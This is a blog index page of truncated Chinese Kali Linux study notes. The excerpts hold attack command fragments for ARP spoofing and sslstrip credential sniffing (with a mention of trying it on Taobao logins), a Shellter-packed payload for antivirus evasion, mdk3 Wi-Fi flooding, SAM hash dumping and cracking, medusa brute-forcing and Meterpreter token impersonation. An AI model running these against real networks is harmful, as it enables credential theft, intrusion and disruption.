摘要: 1. 开转发 2. arpspoof i eth0 t 192.168.110 192.168.1.1 3. ettercap Tq i eth0 1. /etc/ettercap/etter.conf /Linux 去掉 2. sslstrip a s k 淘宝加密的太好啦,看不出密码。。。 1. 阅读全文
posted @ 2017-02-16 18:07 itholiday 阅读(2054) 评论(0) 推荐(0) 编辑
摘要: which vlc 或者 whereis vlc 输入/geteuid,输入i进入输入模式,将geteuid改成getppid,然后ESC,输入wq,保存退出,这样程序root用户就可以运行了。 chrome、vlc等程序使root用户无法使用的原理是:它获取程序的所有者,如果它是root用户,就让 阅读全文
posted @ 2017-02-16 10:52 itholiday 阅读(2641) 评论(0) 推荐(0) 编辑
摘要: Kali Linux系统默认状态下,root用户是无法使用声卡的,也就没有声音。启用的方法如下: (1)在终端执行命令:systemctl user enable pulseaudio (2)在/etc/default/目录下,创建一个文件,命名为pulseaudio,并添加以下内容: PULSEA 阅读全文
posted @ 2017-02-16 10:29 itholiday 阅读(435) 评论(0) 推荐(0) 编辑
摘要: 薄荷开元网 http://www.mintos.org/ 阅读全文
posted @ 2017-02-16 09:42 itholiday 阅读(113) 评论(0) 推荐(0) 编辑
摘要: 1. win32diskimager写入kalilinux镜像,建议用parrot sec os 2. gparted /dev/sdb,新建分区sdb3,Lable输入persistence 4. 挂载/dev/sdb3,echo "/ union" /root/usbsdb3/persisten 阅读全文
posted @ 2017-02-15 19:29 itholiday 阅读(839) 评论(0) 推荐(0) 编辑
摘要: Kali Linux渗透基础知识整理(二):漏洞扫描 :http://www.freebuf.com/sectool/109952.html DVWA(dema vulnerable web application)是一个基于PHP/MYSQL环境写的一个web应用。他的主要目的是帮助安全专业员去测 阅读全文
posted @ 2017-02-15 17:09 itholiday 阅读(144) 评论(0) 推荐(0) 编辑
摘要: nmap Pn sV oX dmz 192.168.1.0/24 db_import /root/dmz db_hosts db_hosts d ip db_services db_hosts h db_autopwn t p e(自动工具所有的ip) db_autopwn t p I ip e(攻 阅读全文
posted @ 2017-02-15 16:12 itholiday 阅读(191) 评论(0) 推荐(0) 编辑
摘要: 加壳: 1. wineconsole shellter 2. A,选自动 3. 将putty.exe移到/usr/share/shllter/目录,PE设置为putty.exe 4. LHOST,LPORT 监视: 1. use exploit/multi/handler 2. set payloa 阅读全文
posted @ 2017-02-15 09:15 itholiday 阅读(258) 评论(0) 推荐(0) 编辑
摘要: Authentication Flood,mdk3下参数为a: mdk3 mon0 a –a AP的MAC地址(BSSID) c来对指定的频道进行攻击 a固定bssid进行攻击 s控制发包速率。一般默认的是200个包/秒 mdk3 mon0 d s参数来加快发包速率 w(白名单) –b(黑名单)来添 阅读全文
posted @ 2017-02-15 08:31 itholiday 阅读(839) 评论(0) 推荐(0) 编辑
摘要: msfvenom 选项: p, payload 有效载荷使用。指定一个有效的自定义载荷 payload options 列出有效载荷的标准选项 l, list [type] 列出一个模块类型。选项有:有效载荷,编码器,NOP,所有 n, nopsled 在一个nopsled [长度]的大小对有效载荷 阅读全文
posted @ 2017-02-14 22:15 itholiday 阅读(1798) 评论(0) 推荐(0) 编辑
摘要: burpsuite nessus w3af sqlmap openvas shellcode 阅读全文
posted @ 2017-02-14 21:39 itholiday 阅读(119) 评论(0) 推荐(0) 编辑
摘要: db_status db_disconnect db_connect 用户名:口令@服务器地址:端口/数据库名称 createdb msf4 E UTF8 T template0 o msf3 hosts dropdb msf4 db_nmap db_nmap Pn sV oX dmz 192.16 阅读全文
posted @ 2017-02-14 17:18 itholiday 阅读(139) 评论(0) 推荐(0) 编辑
摘要: echo LANG="zh_CN.UTF 8" /etc/default/locale 阅读全文
posted @ 2017-02-14 15:04 itholiday 阅读(1292) 评论(0) 推荐(0) 编辑
摘要: 安装openvas: apt install openvas openvas setup netstat antp openvas start Point your browser to https://127.0.0.1:9392, accept the self signed SSL certi 阅读全文
posted @ 2017-02-14 12:11 itholiday 阅读(288) 评论(0) 推荐(0) 编辑
摘要: exploit 漏洞利用代码 编码器模块:免杀、控制 help [cmd] msfcli适合对网络中大量系统统一测试。 打开数据包路由转发功能:/etc/sysctl.conf /etc/rc.local iptables t nat A POSTROUTING s 192.168.10.0/24 阅读全文
posted @ 2017-02-14 09:21 itholiday 阅读(246) 评论(0) 推荐(0) 编辑
摘要: " meterpreter详解与渗透实战 " 基本命令: background quit shell irb client.sys.config.sysinfo() 调用windows API:client.core.use("railgun") 弹出会话窗口:client.railgun.user 阅读全文
posted @ 2017-02-13 19:29 itholiday 阅读(821) 评论(0) 推荐(0) 编辑
摘要: cd /target/windows/system32/config 使用 SamDump2 来提取哈希,并将文件放到你的 root 用户目录中的一个叫做 hashes 的 文件夹中。 samdump2 system SAM /root/hashes/hash.txt john /root/hash 阅读全文
posted @ 2017-02-13 16:53 itholiday 阅读(1911) 评论(0) 推荐(0) 编辑
摘要: 1. vim /etc/etterconf 2. 将 ec_uid 和 ec_gid 改为 0 3. 需要取消下面的 IPTABLES 行的注释。它在靠近文件末尾的 LINUX 一节 4. ettercap G 5. Shift + U 6. Ctrl + S 7. Ctrl + W 8. 最后,我 阅读全文
posted @ 2017-02-13 16:33 itholiday 阅读(270) 评论(0) 推荐(0) 编辑
摘要: medusa –M http h 192.168.10.1 u admin P /usr/share/wfuzz/ wordlist/fuzzdb/wordlists user passwd/passwds/john.txt e ns n 80 F M http 允许我们指定模块。这里,我们选择了 阅读全文
posted @ 2017-02-13 16:28 itholiday 阅读(639) 评论(0) 推荐(0) 编辑
摘要: meterpeter: 1. 可以在 Meterpreter 使用 incognito 来开始模拟过程: use incognito 2. 展示 incognito 的帮助文档,通过输入 help 命令: help 3. 获得可用用户的列表 list_tokens –u 4. 模拟攻击 impers 阅读全文
posted @ 2017-02-13 16:19 itholiday 阅读(375) 评论(0) 推荐(0) 编辑